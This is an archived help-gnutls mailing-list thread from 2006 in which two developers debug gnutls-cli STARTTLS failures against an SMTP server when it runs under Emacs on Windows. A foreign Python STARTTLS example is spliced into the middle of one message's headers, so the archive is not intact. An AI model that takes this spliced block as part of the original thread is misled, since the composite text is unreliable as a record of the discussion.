>> It seems to work somewhat for you now, so the next step is to make it
>> work in M-x shell RET in Emacs.  Does this work?
>
> Yes:
>
> (M-x shell RET)

Which Emacs version is this?  I've had problems reproducing this step,
but I think it depends on the Windows version.  How do you send the
C-z to the sub-process?  Can you send additional data after the TLS
connection is established?  After TLS is negotiated, try typing:

EHLO foo

and see whether it responds or not.

For comparison, when I try this in Emacs 21.3 on Windows 2000,
gnutls-cli receives two EOFs, so after negotiating TLS, it will abort
and the command prompt is shown again.  I'm not sure why this happens.

/Simon

> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
>
> c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
> gnutls-cli --print-cert --port 25 --starttls smtp.web.de
> Resolving 'smtp.web.de'...
> Connecting to '217.72.192.157:25'...
>
> - Simple Client Mode:
>
> 220 smtp05.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 19:42:24 +0200
> ehlo neutrino
> 250-smtp05.web.de Hello neutrino [84.165.71.252]
> 250-SIZE 69920427
> 250-PIPELINING
> 250-AUTH PLAIN LOGIN
> 250-STARTTLS
> 250 HELP
> starttls
> 220 OpenSSL/0.9.7beta go ahead
> *** Starting TLS handshake
> - Certificate type: X.509
>  - Got a certificate list of 1 certificates.
>
>  - Certificate[0] info:
>
> -----BEGIN CERTIFICATE-----
> MIIDZTCCAs6gAwIBAgIQIY4doat2RZ49+oHZDCyaqzANBgkqhkiG9w0BAQQFADCB
> [...]
> WfwOQxZdz7Gu
> -----END CERTIFICATE-----
>
> # The hostname in the certificate matches 'smtp.web.de'.
> # valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007
> # expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007
> # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6
> # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de
> # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com
>
>
> - Peer's certificate issuer is unknown
> - Peer's certificate is NOT trusted
> - Version: TLS 1.0
> - Key Exchange: RSA
> - Cipher: AES 256 CBC
> - MAC: SHA
> - Compression: NULL
> C-c C-c^C
> c:\foo>
> Process shell finished
>
> -- 
> Ralf

From angeli at caeruleus.net Mon Sep 25 21:00:40 2006
From: angeli at caeruleus.net (Ralf Angeli)
Date: Mon, 25 Sep 2006 21:00:40 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
	<87r6y0t9z6.fsf@latte.josefsson.org>
	<87bqp3iy00.fsf@latte.josefsson.org>
Message-ID: 

* Simon Josefsson (2006-09-25) writes:

> Ralf Angeli writes:
>
>> * Simon Josefsson (2006-09-25) writes:
>>
>>> It seems to work somewhat for you now, so the next step is to make it
>>> work in M-x shell RET in Emacs.  Does this work?
>>
>> Yes:
>>
>> (M-x shell RET)
>
> Which Emacs version is this?

M-x emacs-version RET
GNU Emacs 22.0.50.1 (i386-mingw-nt5.1.2600) of 2006-09-14 on NEUTRINO

You can download a version of CVS Emacs from June from .  I'm intending
to upload a newer version once pretesting starts.

> I've had problems reproducing this step,
> but I think it depends on the Windows version.  How do you send the
> C-z to the sub-process?

C-d

> Can you send additional data after the TLS
> connection is established?  After TLS is negotiated, try typing:
>
> EHLO foo
>
> and see whether it responds or not.

I'm not sure if I understand correctly.  Typing "EHLO foo" before
typing `C-d' at least didn't work:

c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
gnutls-cli --port 25 --starttls smtp.web.de
Resolving 'smtp.web.de'...
Connecting to '217.72.192.157:25'...

- Simple Client Mode:

220 smtp08.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 20:55:30 +0200
ehlo neutrino
250-smtp08.web.de Hello neutrino [84.165.71.252]
250-SIZE 69920427
250-PIPELINING
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
starttls
220 OpenSSL/0.9.7beta go ahead
EHLO foo
*** Starting TLS handshake
*** Fatal error: A record packet with illegal version was received.
*** Handshake has failed
*** Starting TLS handshake
*** Fatal error: A record packet with illegal version was received.
*** Handshake has failed
C-c C-c^C

-- 
Ralf

From jas at extundo.com Tue Sep 26 10:15:55 2006
From: jas at extundo.com (Simon Josefsson)
Date: Tue, 26 Sep 2006 10:15:55 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
In-Reply-To: (Ralf Angeli's message of "Mon, 25 Sep 2006 21:00:40 +0200")
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
	<87r6y0t9z6.fsf@latte.josefsson.org>
	<87bqp3iy00.fsf@latte.josefsson.org>
Message-ID: <87u02vgi10.fsf@latte.josefsson.org>

Ralf Angeli writes:

>> Which Emacs version is this?
>
> M-x emacs-version RET
> GNU Emacs 22.0.50.1 (i386-mingw-nt5.1.2600) of 2006-09-14 on NEUTRINO
>
> You can download a version of CVS Emacs from June from
> .  I'm intending to upload a
> newer version once pretesting starts.

Thanks, I will try that one.

>> I've had problems reproducing this step,
>> but I think it depends on the Windows version.  How do you send the
>> C-z to the sub-process?
>
> C-d

Ok.

>> Can you send additional data after the TLS
>> connection is established?  After TLS is negotiated, try typing:
>>
>> EHLO foo
>>
>> and see whether it responds or not.
>
> I'm not sure if I understand correctly.  Typing "EHLO foo" before
> typing `C-d' at least didn't work:

No, you'll need to start gnutls-cli, wait for the server to respond
("220 smtp08...") then type:

starttls

wait for the server to ack the request to start TLS ("220 OpenSSL...")
and then type C-d to invoke the TLS layer.  Once it finishes, you are
talking to the server under the encrypted layer.  If you could then
type:

EHLO foo

at that point, and show me the output, I'll know that the TLS layer
actually works properly.  If you get this far, I think it should be
possible to get Gnus to work too.

I haven't managed to run gnutls-cli in a M-x shell successfully yet,
but hopefully the Emacs version you point me at will help me...

/Simon

> c:\foo>gnutls-cli --print-cert --port 25 --starttls smtp.web.de
> gnutls-cli --port 25 --starttls smtp.web.de
> Resolving 'smtp.web.de'...
> Connecting to '217.72.192.157:25'...
>
> - Simple Client Mode:
>
> 220 smtp08.web.de ESMTP WEB.DE V4.107#114 Mon, 25 Sep 2006 20:55:30 +0200
> ehlo neutrino
> 250-smtp08.web.de Hello neutrino [84.165.71.252]
> 250-SIZE 69920427
> 250-PIPELINING
> 250-AUTH PLAIN LOGIN
> 250-STARTTLS
> 250 HELP
> starttls
> 220 OpenSSL/0.9.7beta go ahead
> EHLO foo
> *** Starting TLS handshake
> *** Fatal error: A record packet with illegal version was received.
> *** Handshake has failed
> *** Starting TLS handshake
> *** Fatal error: A record packet with illegal version was received.
> *** Handshake has failed
> C-c C-c^C
>
> -- 
> Ralf

From angeli at caeruleus.net Tue Sep 26 19:12:05 2006
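The STARTTLS ordering that Simon spells out above (greeting, STARTTLS, wait for the server's 220, only then start the TLS handshake), together with the "record packet with illegal version" failure from the earlier transcripts, as an added example in Python that is neither gnutls-cli code nor part of the thread. The client side drives the plaintext part of the SMTP dialogue and refuses to proceed unless the server advertises STARTTLS and answers 220; it returns at exactly the point where the socket should be handed to a TLS layer. A second function shows what a TLS record layer makes of the first five bytes it reads when, because the handshake started too early, those bytes are a plaintext SMTP reply such as "500 Unrecognized command": content type 0x35 and version (0x30, 0x30), which no TLS implementation accepts. The server transcript, host names and the reply text are constructed, modelled on the ones posted; the functions take file objects so the exchange runs offline.

```python
"""SMTP STARTTLS ordering and the 'illegal version' diagnosis.  Added
illustration, not gnutls-cli code; the server script is constructed."""
import io


def read_reply(rfile):
    """Read one SMTP reply, following '250-' style continuation lines.
    Returns (code, lines)."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":        # last line of this reply
            return int(line[:3]), lines


def negotiate_starttls(rfile, wfile, helo_name="neutrino"):
    """Drive the dialogue up to the point where TLS may begin and return the
    EHLO capabilities.  Only after this returns should the connection be
    handed to the TLS layer (ssl.SSLContext.wrap_socket in Python; the EOF
    keystroke in gnutls-cli).  Sending the ClientHello earlier, or sending
    SMTP commands after the 220, puts plaintext where a TLS record is expected."""
    code, _ = read_reply(rfile)
    if code != 220:
        raise RuntimeError(f"unexpected greeting: {code}")
    wfile.write(f"EHLO {helo_name}\r\n".encode("ascii"))
    code, lines = read_reply(rfile)
    if code != 250:
        raise RuntimeError(f"EHLO rejected: {code}")
    caps = [l[4:].split()[0].upper() for l in lines[1:] if len(l) > 4]
    if "STARTTLS" not in caps:
        raise RuntimeError("server did not advertise STARTTLS")
    wfile.write(b"STARTTLS\r\n")
    code, _ = read_reply(rfile)
    if code != 220:
        raise RuntimeError(f"STARTTLS refused: {code}")
    return caps


def diagnose_as_tls_record(data):
    """Interpret the first five bytes the way a TLS record layer does:
    content type, protocol version, length."""
    if len(data) < 5:
        return None
    head = bytes(data[:5])
    return {
        "content_type": head[0],
        "version": (head[1], head[2]),
        "length": int.from_bytes(head[3:5], "big"),
        "valid_version": head[1] == 3 and head[2] <= 3,   # SSL 3.0 .. TLS 1.2 record versions
        "looks_like_text": all(32 <= b < 127 for b in head),
    }


# Constructed server script, modelled on the transcript in the thread.
SERVER_OK = (b"220 smtp.example.test ESMTP ready\r\n"
             b"250-smtp.example.test Hello neutrino\r\n"
             b"250-SIZE 69920427\r\n"
             b"250-PIPELINING\r\n"
             b"250-AUTH PLAIN LOGIN\r\n"
             b"250-STARTTLS\r\n"
             b"250 HELP\r\n"
             b"220 go ahead\r\n")


def simulate(server_bytes, helo_name="neutrino"):
    """Run the client against a scripted server; return (caps, bytes the client sent)."""
    rfile, wfile = io.BytesIO(server_bytes), io.BytesIO()
    caps = negotiate_starttls(rfile, wfile, helo_name)
    return caps, wfile.getvalue()


if __name__ == "__main__":
    caps, sent = simulate(SERVER_OK)
    print("capabilities:", caps)
    print("client sent:", sent)
    print("plaintext reply seen by the record layer:",
          diagnose_as_tls_record(b"500 Unrecognized command\r\n"))
    print("a real ClientHello record header:",
          diagnose_as_tls_record(b"\x16\x03\x01\x00\x2a"))
```

With a real socket, `rfile = sock.makefile("rb")` and `wfile = sock.makefile("wb", buffering=0)` give the same interface; the capability list is also where a client should check that STARTTLS was offered before it sends anything it would not want on the wire in clear.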
From: angeli at caeruleus.net (Ralf Angeli)
Date: Tue, 26 Sep 2006 19:12:05 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
	<87r6y0t9z6.fsf@latte.josefsson.org>
	<87bqp3iy00.fsf@latte.josefsson.org>
	<87u02vgi10.fsf@latte.josefsson.org>
Message-ID: 

* Simon Josefsson (2006-09-26) writes:

> No, you'll need to start gnutls-cli, wait for the server to respond
> ("220 smtp08...") then type:
>
> starttls
>
> wait for the server to ack the request to start TLS ("220 OpenSSL...")
> and then type C-d to invoke the TLS layer.  Once it finishes, you are
> talking to the server under the encrypted layer.  If you could then
> type:
>
> EHLO foo
>
> at that point, and show me the output, I'll know that the TLS layer
> actually works properly.

Doesn't seem like it works.  I get the following output.  `C-d' was
typed after the line with "220 OpenSSL...".  After I inserted "EHLO
foo" about 20 seconds passed and then the indicated error was thrown.

c:\foo>gnutls-cli --port 25 --starttls smtp.web.de
gnutls-cli --port 25 --starttls smtp.web.de
Resolving 'smtp.web.de'...
Connecting to '217.72.192.157:25'...

- Simple Client Mode:

220 smtp07.web.de ESMTP WEB.DE V4.107#114 Tue, 26 Sep 2006 19:05:24 +0200
starttls
220 OpenSSL/0.9.7beta go ahead
*** Starting TLS handshake
- Certificate type: X.509
 - Got a certificate list of 1 certificates.

 - Certificate[0] info:
# The hostname in the certificate matches 'smtp.web.de'.
# valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007
# expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007
# fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6
# Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de
# Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com


- Peer's certificate issuer is unknown
- Peer's certificate is NOT trusted
- Version: TLS 1.0
- Key Exchange: RSA
- Cipher: AES 256 CBC
- MAC: SHA
- Compression: NULL
EHLO foo
*** gnutls_bye() error: A record packet with illegal version was received.

c:\foo>
Process shell finished

-- 
Ralf

From jas at extundo.com Wed Sep 27 10:29:46 2006
From: jas at extundo.com (Simon Josefsson)
Date: Wed, 27 Sep 2006 10:29:46 +0200
Subject: [Help-gnutls] Re: GnuTLS 1.5.1 for Windows
In-Reply-To: (Ralf Angeli's message of "Tue, 26 Sep 2006 19:12:05 +0200")
References: <87mz8t455l.fsf@latte.josefsson.org>
	<87k63w2h7j.fsf@latte.josefsson.org>
	<87r6y0t9z6.fsf@latte.josefsson.org>
	<87bqp3iy00.fsf@latte.josefsson.org>
	<87u02vgi10.fsf@latte.josefsson.org>
Message-ID: <87r6xxlnk5.fsf@latte.josefsson.org>

Ralf Angeli writes:

> * Simon Josefsson (2006-09-26) writes:
>
>> No, you'll need to start gnutls-cli, wait for the server to respond
>> ("220 smtp08...") then type:
>>
>> starttls
>>
>> wait for the server to ack the request to start TLS ("220 OpenSSL...")
>> and then type C-d to invoke the TLS layer.  Once it finishes, you are
>> talking to the server under the encrypted layer.  If you could then
>> type:
>>
>> EHLO foo
>>
>> at that point, and show me the output, I'll know that the TLS layer
>> actually works properly.
>
> Doesn't seem like it works.  I get the following output.  `C-d' was
> typed after the line with "220 OpenSSL...".  After I inserted "EHLO
> foo" about 20 seconds passed and then the indicated error was
> thrown.

Ok.  I wasn't able to reproduce everything you could, even after
downloading the same Emacs.  After some experimenting, it seems the
select() call in gnutls-cli triggers too soon when gnutls-cli is run
under Emacs.  It waits for input from the user, when there is none.

I think I'll add some debug messages to gnutls-cli's select()
replacement, so it is possible to see if that's the cause or not.
Since we get different results even with the same gnutls and emacs, it
would help if you could try that version too.  I'll get back with the
details when I've added this debug stuff.

> c:\foo>gnutls-cli --port 25 --starttls smtp.web.de
> gnutls-cli --port 25 --starttls smtp.web.de
> Resolving 'smtp.web.de'...
> Connecting to '217.72.192.157:25'...
>
> - Simple Client Mode:
>
> 220 smtp07.web.de ESMTP WEB.DE V4.107#114 Tue, 26 Sep 2006 19:05:24 +0200
> starttls
> 220 OpenSSL/0.9.7beta go ahead
> *** Starting TLS handshake
> - Certificate type: X.509
>  - Got a certificate list of 1 certificates.
>
>  - Certificate[0] info:
> # The hostname in the certificate matches 'smtp.web.de'.
> # valid since: Tue Feb 15:51:50 Westeurop\344ische Normalzeit 2007
> # expires at: Wed Feb 15:51:50 Westeurop\344ische Normalzeit 2007
> # fingerprint: D1:7A:1B:CB:4E:96:CD:DC:E2:D0:39:41:D5:F7:CC:B6
> # Subject's DN: C=DE,ST=Baden-Wuerttemberg,L=Karlsruhe,O=WEB.DE GmbH,CN=smtp.web.de
> # Issuer's DN: C=ZA,ST=Western Cape,L=Cape Town,O=Thawte Consulting cc,OU=Certification Services Division,CN=Thawte Premium Server CA,EMAIL=premium-server at thawte.com
>
>
> - Peer's certificate issuer is unknown
> - Peer's certificate is NOT trusted
> - Version: TLS 1.0
> - Key Exchange: RSA
> - Cipher: AES 256 CBC
> - MAC: SHA
> - Compression: NULL
> EHLO foo
> *** gnutls_bye() error: A record packet with illegal version was received.
>
> c:\foo>
> Process shell finished

Interesting, I haven't seen this so far.

Thanks,
Simon